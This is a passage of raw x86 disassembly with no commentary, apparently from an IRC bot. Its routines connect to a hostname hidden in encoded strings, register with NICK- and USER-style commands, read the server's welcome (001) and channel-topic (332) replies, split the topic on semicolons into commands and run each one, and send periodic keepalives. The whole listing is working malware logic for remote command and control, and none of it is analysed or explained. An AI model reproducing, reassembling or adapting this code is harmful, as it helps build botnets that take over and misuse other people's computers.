lea edx, [ebp+var_820]
push edx
mov edx, [ebp+var_4]
dec edx
push edx
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+var_8]
push [ebp+arg_4]
call dword ptr [eax]
loc_417836: ; CODE XREF: sub_417676+EA�j
; sub_417676+138�j
pop edi
pop esi
pop ebx
leave
retn 18h
sub_417676 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41783D proc near ; CODE XREF: sub_417F01+107�p
var_10F34 = dword ptr -10F34h
var_10734 = dword ptr -10734h
var_10730 = dword ptr -10730h
var_1072C = byte ptr -1072Ch
var_1062C = byte ptr -1062Ch
var_1052C = byte ptr -1052Ch
var_1042C = byte ptr -1042Ch
var_72C = byte ptr -72Ch
var_72B = byte ptr -72Bh
var_62C = byte ptr -62Ch
var_62B = byte ptr -62Bh
var_52C = byte ptr -52Ch
var_52B = byte ptr -52Bh
var_52A = byte ptr -52Ah
var_32C = byte ptr -32Ch
var_32B = byte ptr -32Bh
var_22C = byte ptr -22Ch
var_22B = byte ptr -22Bh
var_1AC = byte ptr -1ACh
var_1AB = byte ptr -1ABh
var_A8 = byte ptr -0A8h
var_A7 = byte ptr -0A7h
var_78 = byte ptr -78h
var_77 = byte ptr -77h
var_54 = byte ptr -54h
var_53 = byte ptr -53h
var_44 = byte ptr -44h
var_43 = byte ptr -43h
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_10 = dword ptr -10h
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10F38h
call sub_411400
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, 1FFh
xor ebx, ebx
push esi
mov [ebp+var_10734], eax
lea eax, [ebp+var_52B]
mov edi, ecx
push ebx
push eax
mov [ebp+var_10730], edi
mov [ebp+var_52C], bl
call sub_407B70
add esp, 0Ch
push edi
push offset aS_4 ; "%s"
lea eax, [ebp+var_52C]
push esi
push eax
call sub_402AEE
lea eax, [ebp+var_52C]
add esp, 10h
lea edi, [eax+1]
loc_4178A5: ; CODE XREF: sub_41783D+6D�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4178A5
sub eax, edi
mov [ebp+eax+var_52C], bl
lea eax, [ebp+var_52C]
push offset asc_420254 ; " :"
push eax
call sub_4037B0
push eax
push offset aS_5 ; "%s"
lea eax, [ebp+var_52C]
push esi
push eax
call sub_402AEE
lea eax, [ebp+var_52C]
add esp, 18h
lea esi, [eax+1]
loc_4178E5: ; CODE XREF: sub_41783D+AD�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4178E5
sub eax, esi
mov [ebp+eax+var_52C], bl
lea eax, [ebp+var_52C]
lea esi, [eax+1]
loc_4178FE: ; CODE XREF: sub_41783D+C6�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4178FE
sub eax, esi
push eax
lea eax, [ebp+var_52A]
push eax
lea eax, [ebp+var_52C]
push eax
call sub_403910
add esp, 0Ch
push offset asc_42025C ; " "
push [ebp+var_10730]
call sub_403A34
cmp eax, ebx
pop ecx
pop ecx
jz short loc_41797F
xor esi, esi
loc_417936: ; CODE XREF: sub_41783D+140�j
push eax
push offset aS_6 ; "%s"
lea edi, [ebp+esi+var_1072C]
push 0FFh
push edi
call sub_402AEE
mov eax, edi
add esp, 10h
lea edi, [eax+1]
loc_417956: ; CODE XREF: sub_41783D+11E�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_417956
sub eax, edi
add eax, esi
push offset asc_420264 ; " "
push ebx
mov [ebp+eax+var_1072C], bl
call sub_403A34
pop ecx
add esi, 100h
cmp eax, ebx
pop ecx
jnz short loc_417936
loc_41797F: ; CODE XREF: sub_41783D+F5�j
xor eax, eax
mov [ebp+var_2C], bl
lea edi, [ebp+var_2B]
stosd
stosd
xor eax, eax
mov [ebp+var_38], bl
lea edi, [ebp+var_37]
stosd
stosd
xor eax, eax
mov [ebp+var_54], bl
lea edi, [ebp+var_53]
stosd
stosd
stosd
xor eax, eax
mov [ebp+var_20], bl
lea edi, [ebp+var_1F]
stosd
push 0FFh
stosd
lea eax, [ebp+var_32B]
push ebx
push eax
mov [ebp+var_32C], bl
call sub_407B70
add esp, 0Ch
push 2Fh
lea eax, [ebp+var_A7]
push ebx
push eax
mov [ebp+var_A8], bl
call sub_407B70
xor eax, eax
mov [ebp+var_14], bl
lea edi, [ebp+var_13]
stosd
stosd
xor eax, eax
mov [ebp+var_44], bl
lea edi, [ebp+var_43]
stosd
add esp, 0Ch
push 7Fh
stosd
lea eax, [ebp+var_22B]
push ebx
push eax
mov [ebp+var_22C], bl
call sub_407B70
add esp, 0Ch
push 9
lea esi, [ebp+var_2C]
mov ebx, offset asc_425543 ; "ÅÜÛÒ"
call sub_4196D1
pop ecx
push 9
lea esi, [ebp+var_38]
mov ebx, offset asc_425555 ; "ÞÜÖÞ"
call sub_4196D1
pop ecx
push 0Dh
lea esi, [ebp+var_54]
mov ebx, offset asc_425570 ; "ÅÇÜÃØÆÒ"
call sub_4196D1
pop ecx
lea ecx, [ebp+var_2C]
lea eax, [ebp+var_1072C]
loc_417A40: ; CODE XREF: sub_41783D+21B�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_417A5E
test dl, dl
jz short loc_417A5A
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_417A5E
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_417A40
loc_417A5A: ; CODE XREF: sub_41783D+20B�j
xor eax, eax
jmp short loc_417A63
; ---------------------------------------------------------------------------
loc_417A5E: ; CODE XREF: sub_41783D+207�j
; sub_41783D+213�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417A63: ; CODE XREF: sub_41783D+21F�j
test eax, eax
jnz short loc_417AA7
push 9
lea esi, [ebp+var_20]
mov ebx, offset asc_42554C ; "ÅÚÛÒ"
call sub_4196D1
mov edi, [ebp+var_10734]
pop ecx
lea eax, [ebp+var_1062C]
push eax
mov eax, esi
push eax
push offset aSS_2 ; "%s %s\r\n"
call sub_4172CC
add esp, 0Ch
test al, al
jnz short loc_417A9F
loc_417A98: ; CODE XREF: sub_41783D+333�j
xor al, al
jmp loc_417EF0
; ---------------------------------------------------------------------------
loc_417A9F: ; CODE XREF: sub_41783D+259�j
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosb
loc_417AA7: ; CODE XREF: sub_41783D+228�j
lea ecx, [ebp+var_38]
lea eax, [ebp+var_1062C]
loc_417AB0: ; CODE XREF: sub_41783D+28B�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_417ACE
test dl, dl
jz short loc_417ACA
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_417ACE
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_417AB0
loc_417ACA: ; CODE XREF: sub_41783D+27B�j
xor eax, eax
jmp short loc_417AD3
; ---------------------------------------------------------------------------
loc_417ACE: ; CODE XREF: sub_41783D+277�j
; sub_41783D+283�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417AD3: ; CODE XREF: sub_41783D+28F�j
test eax, eax
jnz loc_417B75
push 100h
lea esi, [ebp+var_32C]
mov ebx, offset dword_424ED0
call sub_4196D1
pop ecx
mov ecx, esi
lea eax, [ebp+var_1052C]
loc_417AF9: ; CODE XREF: sub_41783D+2D4�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_417B17
test dl, dl
jz short loc_417B13
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_417B17
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_417AF9
loc_417B13: ; CODE XREF: sub_41783D+2C4�j
xor eax, eax
jmp short loc_417B1C
; ---------------------------------------------------------------------------
loc_417B17: ; CODE XREF: sub_41783D+2C0�j
; sub_41783D+2CC�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417B1C: ; CODE XREF: sub_41783D+2D8�j
test eax, eax
jnz loc_417EEE
push 9
lea esi, [ebp+var_14]
mov ebx, offset asc_42555E ; "ßÚÜÛ"
call sub_4196D1
pop ecx
push 30h
lea esi, [ebp+var_A8]
mov ebx, offset dword_424FD0
call sub_4196D1
mov edi, [ebp+var_10734]
pop ecx
mov eax, esi
push eax
lea eax, [ebp+var_32C]
push eax
lea eax, [ebp+var_14]
push eax
push offset aSSS_0 ; "%s %s %s\r\n"
call sub_4172CC
add esp, 10h
loc_417B68: ; CODE XREF: sub_41783D+3E0�j
test al, al
jnz loc_417EEE
jmp loc_417A98
; ---------------------------------------------------------------------------
loc_417B75: ; CODE XREF: sub_41783D+298�j
push 4
mov edi, offset a001 ; "001"
lea esi, [ebp+var_1062C]
pop ecx
xor eax, eax
repe cmpsb
jnz loc_417C22
push 9
lea esi, [ebp+var_14]
mov ebx, offset asc_42555E ; "ßÚÜÛ"
call sub_4196D1
pop ecx
push 9
lea esi, [ebp+var_44]
mov ebx, offset asc_425567 ; "ØÚÑÐ"
call sub_4196D1
lea esi, [ebp+var_32C]
mov ebx, offset dword_424ED0
mov [esp+10h+var_10], 100h
call sub_4196D1
pop ecx
push 30h
lea esi, [ebp+var_A8]
mov ebx, offset dword_424FD0
call sub_4196D1
pop ecx
push 80h
lea esi, [ebp+var_22C]
mov ebx, offset byte_424FE9
call sub_4196D1
mov edi, [ebp+var_10734]
pop ecx
lea eax, [ebp+var_A8]
push eax
lea eax, [ebp+var_32C]
push eax
lea eax, [ebp+var_14]
push eax
mov eax, esi
push eax
lea eax, [edi+5]
push eax
lea eax, [ebp+var_44]
push eax
push offset aSSSSSS ; "%s %s %s\r\n%s %s %s\r\n"
call sub_4172CC
add esp, 1Ch
jmp loc_417B68
; ---------------------------------------------------------------------------
loc_417C22: ; CODE XREF: sub_41783D+34A�j
lea ecx, [ebp+var_54]
lea eax, [ebp+var_1062C]
loc_417C2B: ; CODE XREF: sub_41783D+406�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_417C49
test dl, dl
jz short loc_417C45
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_417C49
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_417C2B
loc_417C45: ; CODE XREF: sub_41783D+3F6�j
xor eax, eax
jmp short loc_417C4E
; ---------------------------------------------------------------------------
loc_417C49: ; CODE XREF: sub_41783D+3F2�j
; sub_41783D+3FE�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417C4E: ; CODE XREF: sub_41783D+40A�j
test eax, eax
jz short loc_417C6A
push 4
mov edi, offset a332 ; "332"
lea esi, [ebp+var_1062C]
pop ecx
xor eax, eax
repe cmpsb
jnz loc_417EEE
loc_417C6A: ; CODE XREF: sub_41783D+413�j
push 8
pop ecx
xor eax, eax
mov [ebp+var_78], 0
lea edi, [ebp+var_77]
rep stosd
mov ebx, 0FFh
push ebx
stosw
xor esi, esi
lea eax, [ebp+var_1AB]
push esi
push eax
mov byte ptr [ebp+var_10730], 0
mov [ebp+var_1AC], 0
call sub_407B70
add esp, 0Ch
push ebx
lea eax, [ebp+var_62B]
push esi
push eax
mov [ebp+var_62C], 0
call sub_407B70
add esp, 0Ch
push ebx
lea eax, [ebp+var_72B]
push esi
push eax
mov [ebp+var_72C], 0
call sub_407B70
add esp, 0Ch
lea eax, [ebp+var_1072C]
push offset asc_42029C ; " :"
push eax
call sub_403A34
push eax
push offset aS_7 ; "%s"
lea eax, [ebp+var_62C]
push ebx
push eax
call sub_402AEE
lea eax, [ebp+var_62C]
add esp, 18h
lea esi, [eax+1]
loc_417D00: ; CODE XREF: sub_41783D+4C8�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417D00
sub eax, esi
mov [ebp+eax+var_62C], cl
lea eax, [ebp+var_1072C]
push offset asc_4202A4 ; "!"
push eax
call sub_403A34
push eax
push offset aS_8 ; "%s"
lea eax, [ebp+var_78]
push 22h
push eax
call sub_402AEE
lea eax, [ebp+var_78]
add esp, 18h
lea esi, [eax+1]
loc_417D3B: ; CODE XREF: sub_41783D+503�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417D3B
sub eax, esi
mov [ebp+eax+var_78], cl
lea eax, [ebp+var_78]
lea esi, [eax+1]
loc_417D4E: ; CODE XREF: sub_41783D+516�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417D4E
sub eax, esi
push eax
lea eax, [ebp+var_77]
push eax
lea eax, [ebp+var_78]
push eax
call sub_403910
add esp, 0Ch
push 4
mov edi, offset a332_0 ; "332"
lea esi, [ebp+var_1062C]
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_417DB4
lea eax, [ebp+var_1042C]
push eax
push offset aS_9 ; "%s"
lea eax, [ebp+var_1AC]
push ebx
push eax
call sub_402AEE
lea eax, [ebp+var_1AC]
add esp, 10h
lea edx, [eax+1]
loc_417DA1: ; CODE XREF: sub_41783D+569�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417DA1
mov byte ptr [ebp+var_10730], 1
jmp loc_417E41
; ---------------------------------------------------------------------------
loc_417DB4: ; CODE XREF: sub_41783D+53D�j
mov esi, [ebp+var_10734]
add esi, 5
lea eax, [ebp+var_1052C]
loc_417DC3: ; CODE XREF: sub_41783D+59E�j
mov cl, [eax]
cmp cl, [esi]
jnz short loc_417DE1
test cl, cl
jz short loc_417DDD
mov cl, [eax+1]
cmp cl, [esi+1]
jnz short loc_417DE1
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_417DC3
loc_417DDD: ; CODE XREF: sub_41783D+58E�j
xor eax, eax
jmp short loc_417DE6
; ---------------------------------------------------------------------------
loc_417DE1: ; CODE XREF: sub_41783D+58A�j
; sub_41783D+596�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417DE6: ; CODE XREF: sub_41783D+5A2�j
test eax, eax
jnz short loc_417E15
lea eax, [ebp+var_78]
push eax
push offset aS_10 ; "%s"
lea eax, [ebp+var_1AC]
push ebx
push eax
call sub_402AEE
lea eax, [ebp+var_1AC]
add esp, 10h
lea edx, [eax+1]
loc_417E0C: ; CODE XREF: sub_41783D+5D4�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417E0C
jmp short loc_417E41
; ---------------------------------------------------------------------------
loc_417E15: ; CODE XREF: sub_41783D+5AB�j
lea eax, [ebp+var_1052C]
push eax
push offset aS_11 ; "%s"
lea eax, [ebp+var_1AC]
push ebx
push eax
call sub_402AEE
lea eax, [ebp+var_1AC]
add esp, 10h
lea edx, [eax+1]
loc_417E3A: ; CODE XREF: sub_41783D+602�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417E3A
loc_417E41: ; CODE XREF: sub_41783D+572�j
; sub_41783D+5D6�j
sub eax, edx
push 100h
lea esi, [ebp+var_72C]
mov ebx, offset byte_425021
mov [ebp+eax+var_1AC], 0
call sub_4196D1
pop ecx
lea eax, [ebp+var_62C]
mov ecx, esi
call sub_419044
test eax, eax
jnz short loc_417E7A
cmp byte ptr [ebp+var_10730], al
jz short loc_417EEE
loc_417E7A: ; CODE XREF: sub_41783D+633�j
xor edi, edi
cmp byte ptr [ebp+var_10730], 0
lea eax, [ebp+var_52C]
jz short loc_417E92
push offset asc_4202BC ; ";"
jmp short loc_417E97
; ---------------------------------------------------------------------------
loc_417E92: ; CODE XREF: sub_41783D+64C�j
push offset asc_4202C0 ; ";"
loc_417E97: ; CODE XREF: sub_41783D+653�j
push eax
call sub_403A34
jmp short loc_417EB3
; ---------------------------------------------------------------------------
loc_417E9F: ; CODE XREF: sub_41783D+67A�j
push offset asc_4202C4 ; ";"
push 0
mov [ebp+edi*4+var_10F34], eax
call sub_403A34
inc edi
loc_417EB3: ; CODE XREF: sub_41783D+660�j
test eax, eax
pop ecx
pop ecx
jnz short loc_417E9F
xor esi, esi
test edi, edi
jle short loc_417EEE
loc_417EBF: ; CODE XREF: sub_41783D+6AF�j
push [ebp+esi*4+var_10F34]
lea eax, [ebp+var_1AC]
push eax
lea eax, [ebp+var_62C]
push eax
lea eax, [ebp+var_78]
push eax
push [ebp+var_10730]
push [ebp+var_10734]
call sub_417676
inc esi
cmp esi, edi
jl short loc_417EBF
loc_417EEE: ; CODE XREF: sub_41783D+2E1�j
; sub_41783D+32D�j ...
mov al, 1
loc_417EF0: ; CODE XREF: sub_41783D+25D�j
mov ecx, [ebp+var_8]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn 4
sub_41783D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417F01 proc near ; CODE XREF: .text:0041C039�p
var_20414 = dword ptr -20414h
var_20410 = dword ptr -20410h
var_2040C = dword ptr -2040Ch
var_20408 = byte ptr -20408h
var_408 = byte ptr -408h
var_407 = byte ptr -407h
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov eax, 20414h
call sub_411400
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
push edi
mov esi, 3FFh
xor ebx, ebx
push esi
lea eax, [ebp+var_407]
mov edi, ecx
push ebx
push eax
mov [ebp+var_20414], edi
mov [ebp+var_408], bl
call sub_407B70
add esp, 0Ch
push ebx
push esi
lea eax, [ebp+var_408]
push eax
push dword ptr [edi]
mov [ebp+var_2040C], ebx
call ds:dword_41D270 ; recv
test eax, eax
jz loc_418016
lea eax, [ebp+var_408]
lea edx, [eax+1]
loc_417F69: ; CODE XREF: sub_417F01+6D�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_417F69
sub eax, edx
mov [ebp+eax+var_408], bl
lea eax, [ebp+var_408]
push offset asc_420238 ; "\r\n"
push eax
call sub_403A34
push 20000h
mov edi, eax
lea eax, [ebp+var_20408]
push ebx
push eax
call sub_407B70
add esp, 14h
cmp edi, ebx
mov esi, 200h
jz short loc_417FEC
lea eax, [ebp+var_20408]
mov [ebp+var_20410], eax
loc_417FB6: ; CODE XREF: sub_417F01+E9�j
push edi
push offset aS_18 ; "%s"
push 1FFh
push [ebp+var_20410]
call sub_402AEE
push offset asc_420240 ; "\r\n"
push ebx
call sub_403A34
add [ebp+var_20410], esi
add esp, 18h
inc [ebp+var_2040C]
mov edi, eax
cmp edi, ebx
jnz short loc_417FB6
loc_417FEC: ; CODE XREF: sub_417F01+A7�j
cmp [ebp+var_2040C], ebx
jle short loc_418012
mov ebx, [ebp+var_2040C]
lea edi, [ebp+var_20408]
loc_418000: ; CODE XREF: sub_417F01+10F�j
push [ebp+var_20414]
mov ecx, edi
call sub_41783D
add edi, esi
dec ebx
jnz short loc_418000
loc_418012: ; CODE XREF: sub_417F01+F1�j
mov al, 1
jmp short loc_418020
; ---------------------------------------------------------------------------
loc_418016: ; CODE XREF: sub_417F01+59�j
push dword ptr [edi]
call ds:dword_41D224 ; closesocket
xor al, al
loc_418020: ; CODE XREF: sub_417F01+113�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_417F01 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41802F proc near ; CODE XREF: .text:0041C027�p
var_450 = dword ptr -450h
var_44C = dword ptr -44Ch
var_448 = byte ptr -448h
var_447 = byte ptr -447h
var_444 = byte ptr -444h
var_443 = byte ptr -443h
var_440 = word ptr -440h
var_43E = word ptr -43Eh
var_43C = byte ptr -43Ch
var_430 = byte ptr -430h
var_42F = byte ptr -42Fh
var_230 = byte ptr -230h
var_22F = byte ptr -22Fh
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 454h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 0
push 1
mov edi, ecx
push 2
mov [ebp+var_450], edi
mov ebx, edx
mov [ebp+var_44C], eax
call ds:dword_41D27C ; socket
cmp eax, 0FFFFFFFFh
mov [edi], eax
jnz short loc_418079
push eax
loc_41806C: ; CODE XREF: sub_41802F+8B�j
call ds:dword_41D224 ; closesocket
xor al, al
jmp loc_41828B
; ---------------------------------------------------------------------------
loc_418079: ; CODE XREF: sub_41802F+3A�j
push 1FFh
lea eax, [ebp+var_22F]
push 0
push eax
mov [ebp+var_230], 0
call sub_407B70
add esp, 0Ch
push 200h
lea esi, [ebp+var_230]
call sub_4196D1
pop ecx
mov eax, esi
push eax
call ds:dword_41D23C ; gethostbyname
mov esi, eax
xor ebx, ebx
cmp esi, ebx
jnz short loc_4180BC
loc_4180B8: ; CODE XREF: sub_41802F+E7�j
push dword ptr [edi]
jmp short loc_41806C
; ---------------------------------------------------------------------------
loc_4180BC: ; CODE XREF: sub_41802F+87�j
push 200h
lea eax, [ebp+var_230]
push ebx
push eax
call sub_407B70
movsx eax, word ptr [esi+0Ah]
add esp, 0Ch
push eax
mov eax, [esi+0Ch]
push dword ptr [eax]
lea eax, [ebp+var_43C]
push eax
call sub_407BF0
add esp, 0Ch
push [ebp+arg_4]
mov [ebp+var_440], 2
call ds:dword_41D278 ; htons
mov [ebp+var_43E], ax
push 10h
lea eax, [ebp+var_440]
push eax
push dword ptr [edi]
call ds:dword_41D240 ; connect
test eax, eax
jnz short loc_4180B8
mov eax, [ebp+var_44C]
lea edx, [eax+1]
loc_418121: ; CODE XREF: sub_41802F+F7�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418121
sub eax, edx
jz short loc_418197
xor eax, eax
mov [ebp+var_18], bl
lea edi, [ebp+var_17]
stosd
push 1FFh
stosd
lea eax, [ebp+var_42F]
push ebx
push eax
mov [ebp+var_430], bl
call sub_407B70
mov ebx, [ebp+var_44C]
add esp, 0Ch
push 200h
lea esi, [ebp+var_430]
call sub_4196D1
pop ecx
push 9
lea esi, [ebp+var_18]
mov ebx, offset asc_425531 ; "ÅÔÆÆ"
call sub_4196D1
mov edi, [ebp+var_450]
pop ecx
lea eax, [ebp+var_430]
push eax
mov eax, esi
push eax
push offset aSS_3 ; "%s %s\r\n"
call sub_4172CC
add esp, 0Ch
xor ebx, ebx
loc_418197: ; CODE XREF: sub_41802F+FB�j
xor eax, eax
mov [ebp+var_24], bl
lea edi, [ebp+var_23]
stosd
stosd
xor eax, eax
mov [ebp+var_30], bl
lea edi, [ebp+var_2F]
stosd
stosd
xor eax, eax
mov [ebp+var_C], bl
lea edi, [ebp+var_B]
stosd
stosw
xor eax, eax
push ebx
mov [ebp+var_448], bl
lea edi, [ebp+var_447]
stosw
push 3
mov [ebp+var_444], bl
lea edi, [ebp+var_443]
pop ecx
lea esi, [ebp+var_448]
stosw
call sub_418E51
pop ecx
push ebx
push 3
lea esi, [ebp+var_444]
call sub_418E1F
xor eax, eax
lea edi, [ebp+var_C]
stosd
stosw
stosb
mov eax, esi
push eax
lea eax, [ebp+var_448]
push eax
push offset aSS_4 ; "%s-%s"
lea eax, [ebp+var_C]
push 6
push eax
call sub_402AEE
lea eax, [ebp+var_C]
add esp, 1Ch
lea esi, [eax+1]
loc_41821E: ; CODE XREF: sub_41802F+1F4�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41821E
sub eax, esi
mov [ebp+eax+var_C], bl
xor eax, eax
lea edi, [ebp+var_448]
stosw
stosb
xor eax, eax
lea edi, [ebp+var_444]
stosw
push 9
lea esi, [ebp+var_24]
mov ebx, offset asc_425528 ; "ÛÜÖÞ"
stosb
call sub_4196D1
pop ecx
push 9
lea esi, [ebp+var_30]
mov ebx, offset asc_42553A ; "ÀÆÐÇ"
call sub_4196D1
mov edi, [ebp+var_450]
pop ecx
lea ebx, [edi+5]
call sub_41748B
push ebx
lea eax, [ebp+var_C]
push eax
mov eax, esi
push eax
push ebx
lea eax, [ebp+var_24]
push eax
push offset aSSSS00S ; "%s %s\r\n%s %s 0 0 :%s\r\n"
call sub_4172CC
add esp, 18h
mov al, 1
loc_41828B: ; CODE XREF: sub_41802F+45�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn 8
sub_41802F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41829C proc near ; CODE XREF: sub_418301+3E�p
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov [ebp+var_10], eax
xor eax, eax
mov [ebp+var_C], 0
lea edi, [ebp+var_B]
push 5
lea esi, [ebp+var_C]
mov ebx, offset asc_425528 ; "ÛÜÖÞ"
stosd
call sub_4196D1
mov ebx, [ebp+var_10]
pop ecx
add ebx, 5
call sub_41748B
push ebx
mov eax, esi
push eax
push offset aSS_5 ; "%s %s\r\n"
mov edi, offset dword_4269BC
call sub_4172CC
mov ecx, [ebp+var_4]
add esp, 0Ch
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn 4
sub_41829C endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_418301 proc near ; DATA XREF: .text:0041BF7C�o
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
push esi
push edi
call sub_418DA0
mov edi, dword_426598
mov esi, dword_42659C
loc_41831A: ; CODE XREF: sub_418301+5A�j
call sub_418DA0
cmp dword_42659C, esi
jl short loc_418344
jg short loc_418331
cmp dword_426598, edi
jbe short loc_418344
loc_418331: ; CODE XREF: sub_418301+26�j
cmp byte_4269C0, 0
jz short loc_418344
push offset dword_4269BC
call sub_41829C
loc_418344: ; CODE XREF: sub_418301+24�j
; sub_418301+2E�j ...
mov edi, dword_426598
mov esi, dword_42659C
push 0C350h
call ds:dword_41D0FC ; Sleep
jmp short loc_41831A
sub_418301 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41835D proc near ; CODE XREF: sub_418AEB+1E�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push offset word_426694
push dword_4267AC
mov [ebp+var_4], 10h
call ds:dword_41D234 ; accept
leave
retn
sub_41835D endp
; =============== S U B R O U T I N E =======================================
sub_41837F proc near ; CODE XREF: sub_418552+1D2�p
arg_0 = dword ptr 4
jmp short loc_418384
; ---------------------------------------------------------------------------
loc_418381: ; CODE XREF: sub_41837F+14�j
mov byte ptr [eax], 5Ch
loc_418384: ; CODE XREF: sub_41837F�j
push 2Fh
push [esp+4+arg_0]
call sub_403850
test eax, eax
pop ecx
pop ecx
jnz short loc_418381
retn
sub_41837F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418396 proc near ; CODE XREF: sub_418552+192�p
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
var_2 = byte ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
mov esi, [ebp+arg_0]
mov eax, esi
push edi
lea ecx, [eax+1]
loc_4183A7: ; CODE XREF: sub_418396+16�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4183A7
sub eax, ecx
inc eax
push eax
call sub_402648
mov ebx, eax
push ebx
call sub_402A45
push eax
push 0
push ebx
call sub_407B70
push 25h
push esi
call sub_403850
add esp, 1Ch
test eax, eax
jnz short loc_418420
loc_4183D7: ; CODE XREF: sub_418396+114�j
mov eax, esi
mov edx, esi
loc_4183DB: ; CODE XREF: sub_418396+4A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4183DB
mov edi, ebx
sub eax, edx
dec edi
loc_4183E7: ; CODE XREF: sub_418396+57�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4183E7
mov ecx, eax
shr ecx, 2
mov esi, edx
mov edx, [ebp+arg_0]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
mov edi, edx
stosd
mov eax, ebx
sub edx, ebx
loc_41840B: ; CODE XREF: sub_418396+7D�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_41840B
xor esi, esi
inc esi
jmp loc_4184B1
; ---------------------------------------------------------------------------
loc_41841D: ; CODE XREF: sub_418396+10E�j
mov eax, [ebp+var_8]
loc_418420: ; CODE XREF: sub_418396+3F�j
mov byte ptr [eax], 0
mov ecx, esi
loc_418425: ; CODE XREF: sub_418396+94�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_418425
sub ecx, esi
mov edi, ebx
mov edx, ecx
dec edi
loc_418433: ; CODE XREF: sub_418396+A3�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_418433
mov ecx, edx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
inc eax
push 2
push eax
mov [ebp+var_8], eax
lea eax, [ebp+var_4]
push eax
rep movsb
call sub_403910
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push offset asc_4204B4 ; "%x"
push eax
mov [ebp+var_2], 0
call sub_4035E4
add esp, 18h
test eax, eax
jz short loc_4184AF
mov eax, ebx
lea esi, [eax+1]
loc_41847B: ; CODE XREF: sub_418396+EA�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41847B
